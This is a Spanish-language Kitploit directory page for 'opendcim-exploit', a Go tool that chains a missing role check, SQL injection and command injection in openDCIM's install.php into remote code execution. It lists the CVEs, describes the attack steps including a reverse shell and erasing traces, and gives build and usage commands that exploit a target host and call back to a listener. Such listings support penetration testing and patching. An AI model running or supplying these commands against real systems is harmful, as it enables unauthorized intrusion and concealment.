Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
opendcim-exploit — Cadena SQLi a RCE en openDCIM install.php (CWE-862 + CWE-89 + CWE-78) | Kitploit
Herramientas/GitHubGitHub/chocapikk/opendcim-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubchocapikk/opendcim-exploit

opendcim-exploit

Cadena SQLi a RCE en openDCIM install.php (CWE-862 + CWE-89 + CWE-78)

Ver Repositorio
52hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

openDCIM - SQLi a RCE mediante Envenenamiento de Configuración

Cadena de ejecución remota de código dirigida al formulario de configuración LDAP de install.php de openDCIM. Construido sobre el framework VulnCheck go-exploit.

Cadena de vulnerabilidades

#CVECWEDescripción
1CVE-2026-28515CWE-862install.php no realiza ninguna comprobación de rol antes del formulario de configuración LDAP - cualquier usuario puede acceder a él
2CVE-2026-28516CWE-89Config::UpdateParameter() usa interpolación de cadenas, consultas apiladas vía PDO+MySQL
3CVE-2026-28517CWE-78report_network_map.php pasa el valor de configuración dot directamente a exec()

Afectados: Todas las versiones (probado en el último commit 4467e9c4)

Cómo funciona

  1. POST a install.php - la inyección SQL a través del formulario LDAP respalda la configuración, sobrescribe dot con un payload de comando
  2. GET report_network_map.php - activa exec(), confirma RCE mediante la salida de id
  3. POST a install.php - sobrescribe dot con un payload de reverse shell
  4. GET report_network_map.php - activa el reverse shell
  5. POST a install.php - restaura todos los valores de configuración originales desde la tabla de respaldo

Cero rastros dejados en la base de datos después de la explotación.

Compilación

root@kitploit:~
go build -o opendcim-exploit .

Uso

Despliegues con Docker (sin autenticación)

root@kitploit:~
# Solo escaneo
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80

# Explotación con reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer

Despliegues con htpasswd (cualquier usuario válido)

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass

SSL

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer

Opciones

Descargar herramienta
FlagDefaultDescripción
-rhostHost objetivo
-rport80Puerto objetivo
-sslfalseUsar HTTPS
-lhostHost del listener (para reverse shell)
-lportPuerto del listener (para reverse shell)
-c2Tipo de C2: SimpleShellServer o SSLShellServer
-usernameUsuario de autenticación básica HTTP (omitir para despliegues SetEnv)
-passwordContraseña de autenticación básica HTTP (omitir para despliegues SetEnv)
-aDetección de activos (comprobar si el objetivo es explotable)
-eModo explotación